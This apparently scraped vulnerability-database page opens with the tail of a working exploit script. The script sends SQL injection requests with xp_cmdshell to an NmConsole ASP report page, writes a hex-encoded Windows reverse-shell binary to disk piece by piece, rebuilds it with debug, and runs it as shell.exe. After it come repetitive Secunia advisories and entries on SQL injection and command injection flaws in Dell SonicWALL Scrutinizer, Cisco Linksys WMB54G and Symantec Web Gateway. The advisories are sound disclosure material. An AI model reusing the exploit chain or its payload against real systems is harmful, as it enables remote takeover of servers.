getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0280 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 00 00 00 00 10 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 00 00 00 00 20 00 00 00 02 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0300 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 02 02 00 00 00 30 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0380 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0400 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0480 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0500 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 66 c7 05 9e 31 40 00 02 00 66 c7 05 a0 31 40 00 11 5c c7 05 a2 31 40 00 ac 10 a4 01 c7 05 ae 31 40 00 44 00 00 00 c7 05 da 31 40 00 00 01 00 00 68 10 30 40 00 68 01 01 00 00 e8 6d 00 00 00 6a 00 6a 00 6a 00 6a 06 6a 01 6a 02 e8 56 00 00 00 8b f8 6a 10 68 9e 31 40 00 57 e8 53 00 00 00 89 3d e6 31 40 00 89 3d ea 31 40 00 89 3d ee 31 40 00 68 f2 31 40 00 68 ae 31 40 00 6a 00 6a 00 6a >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0580 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 6a 01 6a 00 6a 00 68 00 30 40 00 6a 00 e8 07 00 00 00 6a 00 e8 06 00 00 00 ff 25 04 20 40 00 ff 25 00 20 40 00 ff 25 14 20 40 00 ff 25 0c 20 40 00 ff 25 10 20 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0600 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0680 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0700 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 86 20 00 00 74 20 00 00 00 00 00 00 b0 20 00 00 be 20 00 00 a2 20 00 00 00 00 00 00 58 20 00 00 00 00 00 00 00 00 00 00 94 20 00 00 00 20 00 00 64 20 00 00 00 00 00 00 00 00 00 00 c8 20 00 00 0c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 86 20 00 00 74 20 00 00 00 00 00 00 b0 20 00 00 be 20 00 00 a2 20 00 00 00 00 00 00 4f 00 43 72 65 61 74 65 50 72 6f 63 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0780 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 65 73 73 41 00 00 9b 00 45 78 69 74 50 72 6f 63 65 73 73 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 41 00 57 53 41 53 6f 63 6b 65 74 41 00 00 43 00 57 53 41 53 74 61 72 74 75 70 00 00 56 00 63 6f 6e 6e 65 63 74 00 77 73 32 5f 33 32 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0800 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0880 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0900 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 63 6d 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0980 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0a00 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0a80 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo e 0b00 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo >>123.hex ';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo r cx >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo 0a00 >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo w >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'echo q >>123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'debug<123.hex';--");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'copy 1.dll shell.exe';--");
alert("Debug - Triggering Reverse Shell");
getHtmlBody("/NmConsole/Reports/Workspace/Virtualization/WrVMwareHostList/WrVMwareHostList.asp?sGroupList=1;EXEC xp_cmdshell 'shell.exe';--");
}
else
{
alert("Victim Exploited - not running attack again");
//deleteCookie("mix0");
}
| VAR-201207-0237 | CVE-2012-2962 | Dell SonicWALL Scrutinizer SQL injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter. Dell SonicWALL Scrutinizer 9.5.0 and older versions contain a SQL injection vulnerability. Dell SonicWALL Scrutinizer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Dell SonicWALL Scrutinizer 9.0.1 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Dell SonicWALL Scrutinizer "q" SQL Injection Vulnerability
SECUNIA ADVISORY ID:
SA50052
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50052/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50052
RELEASE DATE:
2012-07-26
DISCUSS ADVISORY:
http://secunia.com/advisories/50052/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50052/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50052
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
muts has reported a vulnerability in Dell SonicWALL Scrutinizer,
which can be exploited by malicious people to conduct SQL injection
attacks.
Input passed via the "q" parameter to d4d/statusFilter.php is not
properly sanitised before being used in SQL queries. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability is reported in versions 9.0.0, 9.0.1, and 9.5.0.
SOLUTION:
Update to version 9.5.2.
PROVIDED AND/OR DISCOVERED BY:
muts, Offensive Security.
ORIGINAL ADVISORY:
muts:
http://www.exploit-db.com/exploits/20033/
US-CERT (VU#404051)
http://www.kb.cert.org/vuls/id/404051
Dell:
http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0695 | No CVE | Cisco Linksys WMB54G Remote Command Injection Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
The Cisco Linksys WMB54G is a wireless music bridge product. The TFTP service lacks proper input validation when running the firmware upgrade feature, allowing an attacker to exploit the vulnerability to inject and execute arbitrary SHELL commands. Cisco Linksys WMB54G is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
Cisco Linksys WMB54G 1.0 is vulnerable
| VAR-201207-0060 | CVE-2012-2574 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in the management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to a "blind SQL injection" issue. Symantec Security For advisories, this vulnerability is "blind SQL "Injection".By any third party SQL The command may be executed.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
1) The application improperly validates certain input via the
management console and can be exploited to inject arbitrary shell
commands.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
4) The application improperly validates certain input to multiple
scripts via the management console and can be exploited to e.g.
inject arbitrary shell commands.
5) The application improperly validates certain input via the
management console and can be exploited to change the password of an
arbitrary user of the application.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0236 | CVE-2012-2961 | Symantec Web Gateway SQL Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in the management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. Symantec Security For advisories, this vulnerability is SQL "Injection".By any third party SQL The command may be executed.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50031
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50031/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
RELEASE DATE:
2012-07-23
DISCUSS ADVISORY:
http://secunia.com/advisories/50031/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50031/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50031
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious, local users to bypass certain
security restrictions and by malicious people to bypass certain
security restrictions, conduct SQL injection attacks, and compromise
a vulnerable system.
1) The application improperly validates certain input via the
management console and can be exploited to inject arbitrary shell
commands.
2) An error within the authentication mechanism of the application
can be exploited to bypass the authentication by modification of
certain local files.
3) Certain unspecified input passed to the management console is not
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
4) The application improperly validates certain input to multiple
scripts via the management console and can be exploited to e.g.
inject arbitrary shell commands.
5) The application improperly validates certain input via the
management console and can be exploited to change the password of an
arbitrary user of the application.
The vulnerabilities are reported in versions prior to Database Update
5.0.0.438.
SOLUTION:
Apply Database Update 5.0.0.438.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Offensive Security via CERT/CC
2, 3) Offensive Security via CERT/CC and an anonymous person via
CERT/CC.
4, 5) An anonymous person via CERT/CC.
ORIGINAL ADVISORY:
SYM12-011:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120720_00
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0235 | CVE-2012-2957 | Symantec Web Gateway contains multiple vulnerabilities |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows local users to gain privileges by modifying files, related to a "file inclusion" issue. Symantec Security The advisory states that this vulnerability is "local file inclusion".Authority may be obtained by changing the file by a local user. Successful exploits may lead to other attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
